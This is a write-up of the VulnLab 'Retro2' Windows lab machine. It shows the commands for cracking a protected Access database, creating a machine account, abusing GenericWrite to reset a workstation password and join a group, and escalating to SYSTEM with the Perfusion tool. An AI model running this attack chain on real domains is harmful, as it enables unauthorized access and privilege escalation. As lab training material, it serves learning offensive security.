Vulnlab - Retro2 Writeup

Liam Geyer

๐Ÿ‘พ Machine Overview

This is a writeup of the machine Retro2 from VulnLab, itโ€™s an Easy difficulty Windows machine which featured xyz techniques.

๐Ÿ” Enumeration

I started off with an Nmap scan of the box:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
nmap -sV -sC -Pn 10.10.80.214

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-28 13:00 EST
Stats: 0:00:59 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 81.25% done; ETC: 13:02 (0:00:12 remaining)
Stats: 0:01:04 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 81.25% done; ETC: 13:02 (0:00:13 remaining)
Nmap scan report for 10.10.80.214
Host is up (0.13s latency).
Not shown: 984 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15F75) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15F75)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-28 18:01:01Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro2.vl, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2008 R2 Datacenter 7601 Service Pack 1 microsoft-ds (workgroup: RETRO2)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro2.vl, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2024-12-28T18:02:31+00:00; -12s from scanner time.
| ssl-cert: Subject: commonName=BLN01.retro2.vl
| Not valid before: 2024-08-16T11:25:28
|_Not valid after: 2025-02-15T11:25:28
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: BLN01; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-time:
| date: 2024-12-28T18:01:52
|_ start_date: 2024-12-28T17:56:44
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
|_clock-skew: mean: -15m10s, deviation: 29m57s, median: -12s
| smb-os-discovery:
| OS: Windows Server 2008 R2 Datacenter 7601 Service Pack 1 (Windows Server 2008 R2 Datacenter 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: BLN01
| NetBIOS computer name: BLN01\x00
| Domain name: retro2.vl
| Forest name: retro2.vl
| FQDN: BLN01.retro2.vl
|_ System time: 2024-12-28T19:01:56+01:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 108.93 seconds

Looks like just generic Windows slop. Iโ€™ll start by checking out SMB, and adding BLN01.retro2.vl and retro2.vl to my /etc/hosts file.

๐Ÿ“‚ SMB

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
smbmap -H 10.10.80.214 -u "Guest" -p ""

________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - [email protected]<mailto:[email protected]>
https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)

[+] IP: 10.10.80.214:445 Name: 10.10.80.214 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Public READ ONLY
SYSVOL NO ACCESS Logon server share
[*] Closed 1 connections

Looks like we can read the Public share.

1
smbclient -N '\\BLN01.retro2.vl\Public'

Within the DB folder, I was able to pull an access database file, staff.accdb.

Since I work on a Linux machine I tried converting this to a CSV or another format I could read like 5 different ways but it wouldnโ€™t work.

Checking it out on a Windows box, itโ€™s because the database is password protected.

Database Password Prompt

I used office2john to grab a crackable hash for the file.

1
2
python3 ~/GitHub/john/run/office2john.py ./staff.accdb
staff.accdb:$office$*2013*100000*256*16*[SNIPPED]

It cracked with rockyou.

1
2
3
4
5
6
7
8
9
10
11
12
john office.hash --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (Office, 2007/2010/2013 [SHA1 128/128 AVX 4x / SHA512 128/128 AVX 2x AES])
Cost 1 (MS Office version) is 2013 for all loaded hashes
Cost 2 (iteration count) is 100000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:17 0.02% (ETA: 14:41:44) 0g/s 227.2p/s 227.2c/s 227.2C/s leigh..tripleh
[SNIPPED] (staff.accdb)
1g 0:00:00:20 DONE (2024-12-30 17:09) 0.04816g/s 221.9p/s 221.9c/s 221.9C/s diamante..[SNIPPED]
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Within the DB we can see cleartext credentials for the ldapreader account.

Ldapreader Credentials

Next, I used those credentials to run Bloodhound.

1
bloodhound-python -d retro2.vl -u ldapreader -p [PASSWORD] -ns [IP] -c all --zip

Bloodhound Path

Thereโ€™s a pretty large path here in AD, but it looks like our first steps will be to create a new machine account, exploit GenericWrite over ADMWS01, and then get access to the services group in order to RDP/WinRM into the target machine.

๐Ÿฅˆ User

I started off by checking the MAQ to see if we could in fact make a new workstation.

1
2
3
4
5
nxc ldap BLN01.retro2.vl -u ldapreader -p [PASSWORD] -M maq
SMB 10.10.96.90 445 BLN01 [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
LDAP 10.10.96.90 389 BLN01 [+] retro2.vl\ldapreader:[PASSWORD]
MAQ 10.10.96.90 389 BLN01 [*] Getting the MachineAccountQuota
MAQ 10.10.96.90 389 BLN01 MachineAccountQuota: 10

The MAQ was ten, so I made a new workstation.

1
2
3
4
5
# Using Impacket to make a new machine account
addcomputer.py -computer-name 'giganator$' -computer-pass 'Password123' -dc-host [DC-IP] -domain-netbios retro2.vl 'retro2.vl/ldapreader:[PASSWORD]'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Successfully added machine account giganator$ with password Password123.

Next we need to exploit GenericWrite over the admin workstation. I tried RBCD but wasnโ€™t successful, and wasnโ€™t able to set shadowcreds since thereโ€™s no PKINIT for authentication. I pivoted to trying to change the accountโ€™s password using RPC.

1
net rpc password 'ADMWS01$' Password123 -U 'retro2.vl/giganator$%Password123' -S BLN01.retro2.vl

This worked, and we can now add ourselves to the services group.

1
net rpc group addmem "Services" "ADMWS01$" -U 'retro2.vl/ADMWS01$%Password123' -S BLN01.retro2.vl

Now finally we can RDP to the target machine, which was running Windows Server 2008 R2 Datacenter - what a throwback.

Retro Flag

That lets us grab the flag in the root of the C drive :)

๐Ÿฅ‡ RpcEptMapper Vulnerability

The version of Windows the target machine is running is vulnerable to a vulnerability in Windows 7, Windows Server 2008R2, Windows 8, and Windows Server 2012. The RpcEptMapper/DnsCache regkeys have permissions that allow a user to load a DLL as system.

This can be detected with PrivescCheck - and thereโ€™s a tool Perfusion for exploiting it.

To get this to work I had to compile the tool - and then ran it to grab a system shell.

1
2
# Using Perfusion to get an interactive shell as NT AUTHORITY\SYSTEM
.\Perfusion.exe -c cmd -i

Perfusion Admin Shell

I was able to use this shell to grab the admin flag - yippee!

๐Ÿ“– Resources

๐Ÿ”— Hyperlinkโ„น๏ธ Info
PerfusionTool to exploit RpcEptMapper Vulnerability
PrivescCheckWindows privesc script
Cybersec NotesPerfusion notes
  • Title: Vulnlab - Retro2 Writeup
  • Author: Liam Geyer
  • Created at : 2025-05-17 00:00:00
  • Updated at : 2025-05-26 13:49:34
  • Link: https://lfgberg.org/2025/05/17/vulnlab/retro2/
  • License: This work is licensed under CC BY-NC-SA 4.0.